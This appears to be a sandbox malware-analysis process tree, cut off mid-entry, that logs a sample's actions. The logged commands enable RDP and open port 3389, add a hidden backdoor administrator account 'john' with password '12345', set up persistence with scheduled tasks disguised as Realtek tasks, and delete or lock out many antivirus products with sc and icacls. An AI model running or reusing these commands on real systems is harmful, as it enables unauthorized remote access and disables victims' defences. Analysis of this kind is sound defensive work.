        Suspicious use of SetWindowsHookEx
        PID:1712
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:4964
        • C:\ProgramData\Microsoft\Intel\R8.exe
          C:\ProgramData\Microsoft\Intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:4156
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:804
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:984
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:4228
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:2892
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:200
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:4600
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:4844
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:4316
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4956
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4920
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:976
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:5020
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:1492
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:4184
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:1044
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:3992
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:3656
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:744
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4264
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4508
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:4488
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:4352
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4432
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:4632
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4444
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4980
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4748
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:4764
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:3680
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:4908
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4556
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:4812
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4540
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:1792
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:5092
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    Suspicious use of AdjustPrivilegeToken
                    PID:1400
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:4500
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:5692
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:5912
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:6032
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:6108
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5476
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5168
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:4576
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:5112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:4312
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          Creates scheduled task(s)
          PID:4544
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          Creates scheduled task(s)
          PID:484
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
          Creates scheduled task(s)
          PID:4408
        • C:\ProgramData\WindowsTask\update.exe
          C:\ProgramData\WindowsTask\update.exe
          Executes dropped EXE
          Suspicious use of FindShellTrayWindow
          Suspicious use of SendNotifyMessage
          Suspicious use of SetWindowsHookEx
          PID:4932
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      Creates scheduled task(s)
      PID:1208
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      Creates scheduled task(s)
      PID:2896
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      Creates scheduled task(s)
      PID:1080
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      Creates scheduled task(s)
      PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      PID:3828
      • C:\Windows\SysWOW64\sc.exe
        sc start appidsvc
        PID:2276
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      PID:2100
      • C:\Windows\SysWOW64\sc.exe
        sc start appmgmt
        PID:1536
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      PID:1616
      • C:\Windows\SysWOW64\sc.exe
        sc config appidsvc start= auto
        PID:2172
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      PID:2640
      • C:\Windows\SysWOW64\sc.exe
        sc config appmgmt start= auto
        PID:1088
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:412
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:4068
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      PID:3208
      • C:\Windows\SysWOW64\sc.exe
        sc stop mbamservice
        PID:3792
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      PID:3872
      • C:\Windows\SysWOW64\sc.exe
        sc stop bytefenceservice
        PID:3416
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      PID:3364
      • C:\Windows\SysWOW64\sc.exe
        sc delete bytefenceservice
        PID:980
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      PID:2624
      • C:\Windows\SysWOW64\sc.exe
        sc delete mbamservice
        PID:3264
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      PID:740
      • C:\Windows\SysWOW64\sc.exe
        sc delete crmsvc
        PID:3592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      PID:1500
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state on
        PID:3268
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      PID:3840
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        PID:1264
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      PID:1612
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        PID:3688
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      PID:1732
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        PID:3384
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      PID:2384
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        PID:2732
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
      PID:508
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:1904
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      PID:2620
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:924
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
      PID:988
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:2920
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      PID:2092
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:1368
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
      PID:3000
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4124
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      PID:4168
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:4212
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
      PID:4236
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4280
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      PID:4292
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:4344
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
      PID:4364
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4496
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      PID:4376
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:4504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
      PID:4396
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4548
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      PID:4520
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:4640
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
      PID:4532
      • C:\Windows\SysWOW64\icacls.exe
        icacls c:\programdata\Malwarebytes /deny Admin:(F)
        Modifies file permissions
        PID:4648
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      PID:4664
      • C:\Windows\SysWOW64\icacls.exe
        icacls c:\programdata\Malwarebytes /deny System:(F)
        Modifies file permissions
        PID:4732
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
      PID:4724
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\MB3Install /deny Admin:(F)
        Modifies file permissions
        PID:4788
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      PID:4796
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\MB3Install /deny System:(F)
        Modifies file permissions
        PID:4852
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
      PID:4860
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4968
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      PID:4876
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:4960
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
      PID:5000
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:5044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
      PID:5064
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:5108
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
      PID:4100
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3028
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      PID:2024
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:572
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
      PID:500
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4164
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
      PID:1648
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4176
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
      PID:992
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:1812
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
      PID:3848
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3844
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
      PID:1188
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:1300
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
      PID:3292
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4276
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
      PID:4248
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4296
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
      PID:4368
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4380
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
      PID:4440
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
      PID:4684
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4584
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
      PID:4564
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4704
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
      PID:4808
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4756
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
      PID:4892
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4840
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      PID:4972
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4888
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      PID:4936
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:5028
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
      PID:5036
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:5096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      PID:5076
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:2224
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      PID:1304
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3580
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      PID:2512
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:3932
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      PID:664
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      PID:2188
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:1760
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
      PID:3008
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4192
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
      PID:4232
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3492
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
      PID:4300
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4308
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
      PID:4324
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4304
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
      PID:3524
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4464
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
      PID:4452
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4692
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
      PID:4660
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4596
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
      PID:4744
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4728
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
      PID:4884
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4828
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      PID:4916
      • C:\Windows\SysWOW64\icacls.exe
